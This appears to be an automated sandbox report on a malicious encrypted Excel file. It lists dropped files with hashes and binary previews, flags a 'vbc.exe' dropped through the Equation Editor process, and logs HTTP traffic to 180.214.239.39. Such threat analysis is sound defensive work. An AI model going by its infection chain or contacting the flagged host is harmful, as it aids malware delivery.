.(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\559E50EA.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 687 x 111, 8-bit colormap, non-interlaced
      Category:dropped
      Size (bytes):2493
      Entropy (8bit):7.758903050821124
      Encrypted:false
      SSDEEP:48:F9quw7IIfnKFZR4r5vB4FRLiWWl4sXhGI4Y9E5ZBZ7CK0lrC:nQHO34r5vB4F7Wu6zGXZG/pC
      MD5:A5D66CCBEE7946308A985B0FA9CC74F7
      SHA1:D86FFD2A310B16C59849B8E574B673E36643FDDF
      SHA-256:6B8E5D3AFEA87B138C1084837085EDFF6D74B5001E92897CE6FF087058204B28
      SHA-512:7C65B24A8A88B88831CCF9089B89946FCC26748DB226488155899D73F7B63EAF32424432A66D78B385DED8381A66E2207EE6BF197D6BC550DDD222D323B73D98
      Malicious:false
      Preview: .PNG........IHDR.......o........2...qPLTE.............x.....`.5......5...``.......5..........`.......f.:.5..5.`.`...5..._...55........t.`.`......``4.....Z...U...\.9Z.3f...c.....n..X..N.44....f..:...\...`...:.f..f.:......<v......e:......d5.`.f..\....`````5444\..Z...........Z.....3...4_.78..8.f.f.45..3.5.........3....-l..Z.:.....:.:\.......4..]4..3..7c[._ff:.::.955....:..:.....d3ZZ:::.`5.U......IDATx...=O.P..an.p'.s.q0 I[5....c`.d.....t..{zhm...-.$...@.....q....K....+,.WXB...^a....z...=.z.F...X.E7....(.:.{...px...W..^..N..g....S.c...r.W.CK.s...[*Kv.-5..^.:.f..^.../..BQ....H.~H...[.v./f..y.e..Y.Y.}.CB...`..6{...mz..J.z.O../.m&uV......y._...g)...^..|..Zl..2>.M..c...<..h..~...^..<....i.K..-|.........[A.Ke....sT..H..Z..y`..+v..Vp...U..H6z..J........._...,.S.....t...[..^a....z.%..K....+,.WXB...^a.................`.....Kq7..w....\...'..'....b.......Q#.j.!.,.c..#A..J..^..P%J..^.m.K.=..w.<..k.,..>..w=.v...Y...........&......r.kX-.%6.S..U.B.|........0.
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67F6771.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):11303
      Entropy (8bit):7.909402464702408
      Encrypted:false
      SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
      MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
      SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
      SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
      SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
      Malicious:false
      Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6D991930.jpeg
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
      Category:dropped
      Size (bytes):85020
      Entropy (8bit):7.2472785111025875
      Encrypted:false
      SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
      MD5:738BDB90A9D8929A5FB2D06775F3336F
      SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
      SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
      SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
      Malicious:false
      Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91669DF.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):49744
      Entropy (8bit):7.99056926749243
      Encrypted:true
      SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
      MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
      SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
      SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
      SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
      Malicious:false
      Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\97BC617C.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):49744
      Entropy (8bit):7.99056926749243
      Encrypted:true
      SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
      MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
      SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
      SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
      SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
      Malicious:false
      Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\98E3C7D6.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 779 x 181, 8-bit colormap, non-interlaced
      Category:dropped
      Size (bytes):5842
      Entropy (8bit):7.92185581034873
      Encrypted:false
      SSDEEP:96:+Q9KyOE9ulJ01zAcTCcAZd+0Mvin1EFi0sAMcNV99iyysx8JXmaaINsWHfjMzNzl:4yvmJ0VmQE/Ovi0aa5EMzNzl
      MD5:871E67261292737F85DEE051B2EF5B1A
      SHA1:3108E69E8BEABB0CD820696E9F22889B5E7D3224
      SHA-256:F35AAA75635EB695B2DA69C932ECBD5AD4DB934EBFB0433DAC7913C2B7551A6A
      SHA-512:3C0CC7DF2D5080166C1C35C0D120CA686A8EF09348AB0F28CE6859FEC9F7DD3AB16955D79E1C092A5D78666FAE978F69E632D9FB307776E69FD586ADA605FEAF
      Malicious:false
      Preview: .PNG........IHDR.............'P......gAMA......a.....sRGB.........pHYs..........o.d....PLTE...............LLL.....................................................................ppp......`.6................?.6.._...`Bi...Y..f...%E........_...5DG....._.tNq.8.6..<?.....5...PVj..X.1...4U..._z..ANTT.b...kt..zZ5...........__..........~.......ff`.........H#....DIDATx..[.[....R..lK.|....E*........P.....sz...3..I...X#.....ffwv...n...~:.X...E}......\`}.g..>.3.X........r!.`.:..B8\.f0f....lx4..7s.o....F.&..\............s!\........o.....Ssa....1.X.<9."sso...G.\XX..q.2.....D@.0...".'.'/0.......K.px......X.....`......iD..c.-.....J//.o.,....<......9m). ..R...@'..q.y....N..&$...v94.q..<.w.\.P......f_.... ...B.0}o.....y......l.Z..PzRb..F.....[..)..........J,....B....t(..BR...w .Q...S...H...{.....7P........o...Ol..fV.\.........}.......A'.g.:E.7.u.........|.5pDj..f0.E:n..'. .....E..j^..tp\H;....3...C\..u.e..P.{...6.9....".6M....K..".F.D.a0.....|>.T...x.Yj....C".
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A298892B.emf
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):7608
      Entropy (8bit):5.0774464665993575
      Encrypted:false
      SSDEEP:96:+Sc4AAjL6BGj/MQU8DbwiMOtWmVz76F2MqdTfOYL/xRp7uGkmrI:5cqjU+H3tWa6WdTfOYLpR8d
      MD5:70A88C1226FC889154191297A4A09A2F
      SHA1:03234CA14006B1F4C1A45A06BD4BE69E7B2B70EC
      SHA-256:BEE993BAEB024759B6F3DB327531AAB552A87B79B3FE112E311AEF9D9FE0A3CF
      SHA-512:655CF38CC37DBA421408536253142E347644D542E475464D867466044FF521523EE66FE0E4F7BAC960DBB795C8DBD00E2DFBB7C8D675E68131F52415B6AC81F5
      Malicious:false
      Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................j.6.).X.......d......................P.....p....\...................p........6Pv...p....`..pxij.$y.v..................v....$.......d.......4...^.p.....^.p........P.{.....-.......<.v................<.>v.Z.v....X.a....xij........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BB193A54.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):84203
      Entropy (8bit):7.979766688932294
      Encrypted:false
      SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
      MD5:208FD40D2F72D9AED77A86A44782E9E2
      SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
      SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
      SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
      Malicious:false
      Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB194BA7.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 779 x 181, 8-bit colormap, non-interlaced
      Category:dropped
      Size (bytes):5842
      Entropy (8bit):7.92185581034873
      Encrypted:false
      SSDEEP:96:+Q9KyOE9ulJ01zAcTCcAZd+0Mvin1EFi0sAMcNV99iyysx8JXmaaINsWHfjMzNzl:4yvmJ0VmQE/Ovi0aa5EMzNzl
      MD5:871E67261292737F85DEE051B2EF5B1A
      SHA1:3108E69E8BEABB0CD820696E9F22889B5E7D3224
      SHA-256:F35AAA75635EB695B2DA69C932ECBD5AD4DB934EBFB0433DAC7913C2B7551A6A
      SHA-512:3C0CC7DF2D5080166C1C35C0D120CA686A8EF09348AB0F28CE6859FEC9F7DD3AB16955D79E1C092A5D78666FAE978F69E632D9FB307776E69FD586ADA605FEAF
      Malicious:false
      Preview: .PNG........IHDR.............'P......gAMA......a.....sRGB.........pHYs..........o.d....PLTE...............LLL.....................................................................ppp......`.6................?.6.._...`Bi...Y..f...%E........_...5DG....._.tNq.8.6..<?.....5...PVj..X.1...4U..._z..ANTT.b...kt..zZ5...........__..........~.......ff`.........H#....DIDATx..[.[....R..lK.|....E*........P.....sz...3..I...X#.....ffwv...n...~:.X...E}......\`}.g..>.3.X........r!.`.:..B8\.f0f....lx4..7s.o....F.&..\............s!\........o.....Ssa....1.X.<9."sso...G.\XX..q.2.....D@.0...".'.'/0.......K.px......X.....`......iD..c.-.....J//.o.,....<......9m). ..R...@'..q.y....N..&$...v94.q..<.w.\.P......f_.... ...B.0}o.....y......l.Z..PzRb..F.....[..)..........J,....B....t(..BR...w .Q...S...H...{.....7P........o...Ol..fV.\.........}.......A'.g.:E.7.u.........|.5pDj..f0.E:n..'. .....E..j^..tp\H;....3...C\..u.e..P.{...6.9....".6M....K..".F.D.a0.....|>.T...x.Yj....C".
      C:\Users\user\Desktop\~$DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsx
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):330
      Entropy (8bit):1.4377382811115937
      Encrypted:false
      SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
      MD5:96114D75E30EBD26B572C1FC83D1D02E
      SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
      SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
      SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
      Malicious:true
      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      C:\Users\Public\vbc.exe
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):259192
      Entropy (8bit):4.6012516392465255
      Encrypted:false
      SSDEEP:1536:2blgLWMXncWYqmOeDA6W6h8eaBWTvYeigJ2cI6wt:NLWMXntzVAA6W6GwZJgt
      MD5:9318CD06A9A0B788DC043A63C97D4FCE
      SHA1:A296EA3E1CF6D41F9D059D7D6E5058882B03161A
      SHA-256:7AD18B09938D40E8EC342EE6BEE6B190A986FFEDCE7567A638B8D25B4098CB69
      SHA-512:DA057BF10D5A7AE8863DD0310B3D4116AF6535AACC68074C9C301E79F580860C2CECBA991628D274D62E029EE210F92705C12125DC390072556CA031A16CD4B3
      Malicious:true
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y....................................Rich............PE..L.....zY.................@...................P....@.................................eR......................................$F..(....`...p..........X... ...................................................(... ....................................text...d:.......@.................. ..`.data........P.......P..............@....rsrc....p...`.......`..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

      Static File Info

      General

      File type:CDFV2 Encrypted
      Entropy (8bit):7.994383691720442
      TrID:
      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
      File name:DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsx
      File size:1163264
      MD5:ab57abd998267541ce6d27ecf2b85ba5
      SHA1:4840478268380cf80e55d5ca019d108236d100a6
      SHA256:6af62a337c410357a5f49294e98ead83092c6a1d3b73e58c2f56ea5abfdd745e
      SHA512:3aab6a08a924bb2453fa3b67ad5a252f0e855a97d90f9e51612aa87d62ecfcb1721ee6cc23a7be8616e72759ba966e82cdf8e25457bfd005502c3d4aeba9bb0d
      SSDEEP:24576:4euFjaC6WRHUXZ1oTCc6RX4+AogtnEHj2cwEcX1/68kyuMHFnoRoPE:4evC7RHUXZpc6AoCEDtRc168zlnHE
      File Content Preview:........................>...............................................................................................z.......|.......~......................................................................................................................

      File Icon

      Icon Hash:e4e2aa8aa4b4bcb4

      Network Behavior

      Network Port Distribution

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      Aug 2, 2021 07:25:38.777193069 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:39.065315008 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:39.065459013 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:39.066087961 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:39.361825943 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:39.361854076 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:39.361875057 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:39.361891985 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:39.361922026 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:39.361953020 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:39.656249046 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:39.656316996 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:39.656342983 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:39.656366110 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:39.656385899 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:39.656407118 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:39.656429052 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:39.656450033 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:39.656538963 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:39.656564951 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:39.656569004 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:39.940980911 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:39.941014051 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:39.941028118 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:39.941046953 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:39.941060066 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:39.941077948 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:39.941096067 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:39.941111088 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:39.941127062 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:39.941145897 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:39.941162109 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:39.941164970 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:39.941179991 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:39.941196918 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:39.941200972 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:39.941206932 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:39.941210985 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:39.941217899 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:39.941220045 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:39.941232920 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:39.941235065 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:39.941248894 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:39.941252947 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:39.941272974 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:39.941625118 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:39.943270922 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:40.221266031 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221314907 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221349955 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221390009 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221415043 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221443892 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221456051 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221468925 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221483946 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221503019 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221514940 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221525908 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221538067 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221541882 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:40.221553087 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221565962 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221577883 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221587896 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:40.221589088 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221597910 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:40.221601963 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221606970 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:40.221615076 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221615076 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:40.221622944 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:40.221626043 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221638918 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221649885 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221652985 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:40.221673965 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221688986 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221692085 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:40.221703053 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221709967 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:40.221714973 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221719027 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:40.221726894 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:40.221726894 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221740007 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221746922 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:40.221750975 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221762896 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221775055 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.221801996 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:40.221813917 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:40.221822977 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:40.225064993 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:40.518326998 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.518388033 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.518436909 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.518474102 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.518511057 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.518547058 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.518580914 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:40.518584013 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.518611908 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:40.518621922 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:40.518657923 CEST4916780192.168.2.22180.214.239.39
